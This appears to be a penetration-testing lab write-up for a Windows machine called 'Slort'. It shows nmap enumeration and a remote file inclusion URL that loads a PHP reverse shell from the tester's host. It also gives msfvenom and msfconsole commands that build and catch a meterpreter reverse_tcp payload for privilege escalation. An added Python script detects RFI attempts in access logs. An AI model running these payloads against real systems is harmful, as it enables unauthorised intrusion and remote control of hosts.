🪟Slort
IP: 192.168.116.53
Enumeration
Nmap scan
nmap -sV 192.168.116.53 -A -p-

Found that this server is affected by RFI. Could see that when I included the IP address and sent the request, it actually hit my HTTP server. Could not get the pentestmonkey PHP reverse shell to work. Uname does not exist. Found that uname is not a command on Windows systems.
Found a nice universal PHP shell at https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php This new shell is compatible with Windows and Linux. Sent the RFI attempt again.
http://192.168.116.53:8080/site/index.php?page=http://192.168.49.116/PHP/universalphprevshell.php
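
Seen from the defender's side, a request like the one above leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original notes: it scans combined-format log lines for query parameters whose decoded value starts with a remote wrapper. The log lines are constructed and the function name is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Prefixes that make a PHP include() pull content from outside the local tree.
# "\\\\" is a UNC path (\\host\share), relevant on Windows hosts.
REMOTE_WRAPPERS = ("http://", "https://", "ftp://", "ftps://",
                   "php://", "data:", "expect://", "\\\\")

# Combined log format: source ip ... "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def find_rfi_attempts(log_lines):
    """Return (source_ip, parameter, decoded_value, status) for each query
    parameter whose value starts with a remote wrapper. Hits are candidates
    for triage: a legitimate redirect parameter would also match."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes, so page=http%3A%2F%2F... is caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if value.strip().lower().startswith(REMOTE_WRAPPERS):
                hits.append((m.group("src"), name, value, int(m.group("status"))))
    return hits

# Constructed sample log (not captured from the target).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 4096',
    '192.168.49.116 - - [01/Jan/2024:10:01:12 +0000] "GET /site/index.php?page=http://192.168.49.116/PHP/universalphprevshell.php HTTP/1.1" 200 512',
    '192.168.49.116 - - [01/Jan/2024:10:01:40 +0000] "GET /site/index.php?page=http%3A%2F%2F192.168.49.116%2FPHP%2Funiversalphprevshell.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:02:03 +0000] "GET /site/css/style.css HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for src, param, value, status in find_rfi_attempts(SAMPLE_LOG):
        print(f"{src} {param}={value} -> HTTP {status}")
```

A 200 response to a flagged request is worth checking against the PHP configuration: with allow_url_include disabled, include() refuses http:// and ftp:// sources.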
Shell

Found an interesting file.

Had to get a hint here as Winpeas did not turn up much.
Found backup folder at C:\Backup

Made a reverse shell with meterpreter hoping this would spawn another shell.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.116 LPORT=6698 -f exe -o reverse1.exe
Shell dropped as soon as it popped in. I believe this happened because I was just using nc as a listener when I used a meterpreter shell. Using revshells I got a one-liner for a meterpreter handler.
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.49.116; set lport 6698; exploit"
Waited for a while and never got a shell. Used TFTP.EXE. It does pop a shell back to me. Waiting again for TFTP.exe to run. Had to restart the machine as my VPN disconnected and the machine shut down.
Root
